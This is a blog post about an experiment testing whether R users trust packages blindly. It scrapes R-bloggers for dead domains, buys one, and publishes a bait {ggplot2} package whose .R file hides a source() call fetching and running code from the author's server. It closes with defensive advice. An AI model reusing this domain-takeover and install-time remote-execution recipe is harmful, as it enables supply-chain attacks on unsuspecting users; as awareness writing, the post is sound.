R Packages: Are we too trusting?
One of the great things about R is the myriad of packages. Packages are typically installed via
- CRAN
- Bioconductor
- GitHub
But how often do we think about what we are installing? Do we pay attention, or do we just install when something looks neat? Do we think about security, or do we simply assume that everything is secure? In this post, we conducted a little nefarious experiment to see if people pay attention to what they install.
R-bloggers: The hook
R-bloggers is a great resource for keeping on top of what's happening in the world of R. It's one of the resources we recommend whenever we run training courses. For an author to get their site syndicated on R-bloggers, they have to email Tal, who will ensure that the site isn't spammy. I recently saw a tweet (I can't remember from whom) suggesting, tongue in cheek, that to boost your website ranking you should just grab a site that used to appear on R-bloggers.
This gave me an idea for something a bit more devious! Instead of boosting website traffic, could we grab a domain, create a dummy R package, and then monitor who installs this package?
A list of contributing sites is helpfully provided by R-bloggers. A quick and dirty script identifies potential target domains. First, we load a few packages
library(httr)
library(tidyverse)
library(rvest)
Then we extract all URLs from the page
page_source = "https://www.r-bloggers.com/blogs-list/" %>%
  read_html()
urls = html_attr(html_nodes(page_source, "a"), "href")
With a little helper function to get the status code
# If a site is available, it should return status code 200
get_status_code = function(url) {
  status = try(GET(url)$status, silent = TRUE)
  if (inherits(status, "try-error"))
    status = NA
  status
}
we simply probe each URL
# Lots of threads
status_codes = parallel::mclapply(urls, get_status_code, mc.cores = 24)
status_codes = unlist(status_codes)
In total, there were 43 URLs not returning the required status code of 200
tibble(urls = urls, status_codes = status_codes) %>%
  filter(!is.na(status_codes)) %>%
  filter(status_codes != 200) %>%
  head()
# A tibble: 6 x 2
urls status_codes
<chr> <int>
1 http://www.56n.dk 406
2 http://bio7.org/ 403
3 http://www.seascapemodels.org/bluecology_blog/index.html 404
4 https://climateecology.wordpress.com 410
5 http://www.compmath.com/blog 500
6 https://hamiltonblake.github.io 404
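For completeness, the total quoted above can be obtained with a one-liner along these lines (a sketch reusing the urls and status_codes vectors from above):

# Count the URLs that responded but did not return a 200
tibble(urls = urls, status_codes = status_codes) %>%
  filter(!is.na(status_codes), status_codes != 200) %>%
  nrow()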
In the end, we went with vinux.in. Using the Wayback Machine, this site seems to have died around 2017. The cost of claiming this site was £10 for the year.
By claiming this site, I have automatically got a site that has incoming traffic. One evil strategy would be to simply sit back and collect traffic from R-bloggers.
{blogdown} & {ggplot2}: The bait
Next, I created a GitLab user rstatsgit and a blog via the excellent {blogdown} package. Now, clearly we need something to entice people to run our code, so I created a very simple R package that scans {ggplot2} themes. Nothing fancy, only a dozen lines of code or so. In case someone looked at the GitHub page, I just copied a few badges from other packages to make it look more genuine. I used Netlify to link our new blog to our recently purchased domain. The resulting blog doesn't look too bad at all.
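To give a rough idea of what such a package might contain, here is a sketch; this is not the actual package code, and the function name scan_themes() is invented for illustration:

# Sketch only: list the theme_* functions exported by {ggplot2}
scan_themes = function() {
  exports = getNamespaceExports("ggplot2")
  sort(grep("^theme_", exports, value = TRUE))
}

scan_themes()
#> e.g. "theme_bw", "theme_classic", "theme_dark", ...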
At the bottom of one of the .R files in the package, there is a simple source() command. This, in theory, could be used to do anything: grab data, passwords, or SSH keys. Clearly, we don't do any of this. Instead, it simply pings a site to tell us if the package has been installed.
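To make the mechanism concrete, a single line like the one below is all it takes; the file name ping.R is made up here for illustration, and the exact URL used in the package isn't confirmed:

# Hypothetical sketch - the path "ping.R" is invented for illustration.
# Top-level code in a package's R/ files runs when the package is installed,
# so this fetches and executes whatever the remote server chooses to return.
source("https://vinux.in/ping.R")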
R-bloggers & Twitter: Delivery
To deliver the content, I'm going for a combination of trying to get it onto R-bloggers via the old RSS feed and tweeting about the page with the #rstats tag.
Did people install the package?
I’ll update the blog post with results in a week or two.
Who is not to blame?
It’s instructive to think about who is not to blame:
- GitLab/GitHub: it would be impossible for them to police the code that is uploaded to their sites.
- {devtools} (install_git*()): There are many legitimate uses for these functions. Blaming them would be equivalent to blaming StackOverflow for bad advice; it doesn't really make sense.
- R-bloggers: It simply isn't feasible to thoroughly vet every post. In the past, the site has quickly reacted to anything spammy and removed offending articles. They also have no control over the code hosted on the sites they link to.
- The person who owned the site: Nope. They owned the site. Now they don’t. They have no responsibility.
Who is to blame?
Well, I suppose I'm to blame, since I created the site and package ;) But more seriously, if you installed the package, you're to blame! I think everyone is guilty of copying and pasting code from blogs, StackOverflow, and forums without always understanding what's going on. But the internet is a dangerous place, and most people who use R almost certainly have juicy data that shouldn't be released to the outside world.
By pure coincidence, I’ve noticed that Bob Rudis has started emphasising that we should be more responsible about what we install.
How to protect against this?
This is something we have been helping clients tackle over the last two years. On one hand, companies use R to run the latest algorithms and try cutting edge visualisation methods. On top of this, they employ bright and enthusiastic data scientists who enjoy what they do. If companies make things too restrictive, people will either find a way around the problem or simply leave.
The crucial thing to remember is that if someone really wants to do something unsafe, we can't stop them. Instead, we need to provide safe alternatives that don't hinder work while at the same time reducing overall risk.
When dealing with companies, we help them tackle the problem in a number of ways:
- Education! Both of the team and team leaders!
- Have an internal package repository. Either we build this, or we use RStudio's Package Manager (we're one of the few RStudio Certified Partners in the world); see the sketch after this list.
- We may disable tools such as install_github()
- Reduce risk by having clear testing and deployment machines
- Implement two-factor authentication
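As a minimal illustration of the internal repository point above (the URL is a placeholder, not a real repository):

# Point R at a vetted internal repository instead of a public CRAN mirror.
# The URL below is a placeholder for your organisation's own server,
# e.g. an RStudio Package Manager instance.
options(repos = c(internal = "https://packages.example.com/cran/latest"))

# Installs now come from the internal, curated mirror
install.packages("ggplot2")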
All of the above can be circumvented by a data scientist. But the idea is that, with education, we can reduce the potential risk without impeding day-to-day work.